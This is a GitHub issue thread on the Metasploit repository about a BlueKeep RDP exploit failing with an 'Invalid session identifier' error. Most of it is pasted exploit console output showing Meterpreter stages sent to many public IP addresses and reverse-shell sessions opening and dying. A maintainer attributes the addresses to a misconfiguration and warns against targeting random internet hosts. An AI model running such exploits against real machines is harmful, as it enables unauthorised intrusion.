### ISSUE TITLE
Bluekeep [-] Invalid session identifier: 19 

### ISSUE THREAD

**Issue by kosmosx2** [rapid7/metasploit-framework#12330]
```
[*] Started reverse TCP handler on 192.168.1.2:4444
[*] 7x.1x6.x1.x1:3389     - Detected RDP on 7x.1x6.x1.x1:3389     (Windows version: 6.1.7600) (Requires NLA: No)
[*] Sending stage (206403 bytes) to 94.177.203.106
[*] 7x.1x6.x1.x1 - Meterpreter session 19 closed.  Reason: Died
[+] 7x.1x6.x1.x1:3389     - The target is vulnerable.
[*] Meterpreter session 19 opened (127.0.0.1 -> 94.177.203.106:63458) at 2019-09-15 15:50:56 +0300
[*] 7x.1x6.x1.x1:3389 - Using CHUNK grooming strategy. Size 2MB, target address 0xfffffa8003a00000, Channel count 1.
[*] 7x.1x6.x1.x1:3389 - Surfing channels ...
[*] Sending stage (206403 bytes) to 95.255.69.105
[*] 7x.1x6.x1.x1:3389 - Lobbing eggs ...
[*] 7x.1x6.x1.x1:3389 - Forcing the USE of FREE'd object ...
**[-] Invalid session identifier: 19**
```

**Comment by h00die** [comment]
4th line down says session died

**Comment by kosmosx2** [comment]
> 4th line down says session died

[*] Meterpreter session 68 opened (192.168.1.2:4444 -> 2.44.188.8:49910) at 2019-09-15 15:59:01 +0300
[*] Sending stage (206403 bytes) to 93.186.251.103
[*] 7x.1x6.x1.x1 - Meterpreter session 68 closed.  Reason: Died
[*] 7x.1x6.x1.x1 - Meterpreter session 69 closed.  Reason: Died
[*] Meterpreter session 69 opened (127.0.0.1 -> 93.186.251.103:60864) at 2019-09-15 15:59:02 +0300
[*] Sending stage (206403 bytes) to 80.211.153.29
[*] 7x.1x6.x1.x1 - Meterpreter session 70 closed.  Reason: Died
[*] Meterpreter session 70 opened (127.0.0.1 -> 80.211.153.29:65153) at 2019-09-15 15:59:02 +0300
[*] Sending stage (206403 bytes) to 188.42.234.44
[*] Meterpreter session 71 opened (192.168.1.2:4444 -> 188.42.234.44:60819) at 2019-09-15 15:59:03 +0300
[*] Sending stage (206403 bytes) to 164.132.73.5
[*] 7x.1x6.x1.x1 - Meterpreter session 71 closed.  Reason: Died
[*] Meterpreter session 72 opened (192.168.1.2:4444 -> 164.132.73.5:51582) at 2019-09-15 15:59:03 +0300
[*] Sending stage (206403 bytes) to 89.233.146.106
[*] 7x.1x6.x1.x1 - Meterpreter session 72 closed.  Reason: Died
[*] 7x.1x6.x1.x1 - Meterpreter session 73 closed.  Reason: Died
[*] Meterpreter session 73 opened (127.0.0.1 -> 89.233.146.106:60703) at 2019-09-15 15:59:03 +0300
[*] Sending stage (206403 bytes) to 185.142.212.118
[*] 7x.1x6.x1.x1 - Meterpreter session 74 closed.  Reason: Died
[*] Meterpreter session 74 opened (127.0.0.1 -> 185.142.212.118:63395) at 2019-09-15 15:59:04 +0300
[*] Sending stage (206403 bytes) to 80.211.198.215
[*] Meterpreter session 75 opened (192.168.1.2:4444 -> 80.211.198.215:57977) at 2019-09-15 15:59:04 +0300
[*] Sending stage (206403 bytes) to 88.85.95.215
[*] 7x.1x6.x1.x1 - Meterpreter session 75 closed.  Reason: Died
[*] Meterpreter session 76 opened (192.168.1.2:4444 -> 88.85.95.215:63574) at 2019-09-15 15:59:05 +0300
[*] 7x.1x6.x1.x1 - Meterpreter session 76 closed.  Reason: Died
[*] Sending stage (206403 bytes) to 93.160.56.76

**Comment by kosmosx2** [comment]
[*] 7x.1x.1x3.x3 - Meterpreter session 10 closed.  Reason: Died
[*] Meterpreter session 11 opened (192.168.1.2:4444 -> 185.58.194.104:51137) at 2019-09-15 16:04:33 +0300
[*] Sending stage (206403 bytes) to 93.186.251.103
[*] 7x.1x.1x3.x3 - Meterpreter session 11 closed.  Reason: Died
[*] Meterpreter session 12 opened (192.168.1.2:4444 -> 93.186.251.103:50878) at 2019-09-15 16:04:34 +0300
[*][*] 7x.1x.1x3.x3:3389 - Forcing the USE of FREE'd object ...
 Sending stage (206403 bytes) to 212.24.153.132

meterpreter >
[*] 7x.1x.1x3.x3 - Meterpreter session 12 closed.  Reason: Died

**Comment by busterb** [comment]
You have an invalid address somewhere in your config, these are all private listener addresses targeting router IPs. Also, do not target random IPs on the internet, or post then to github.
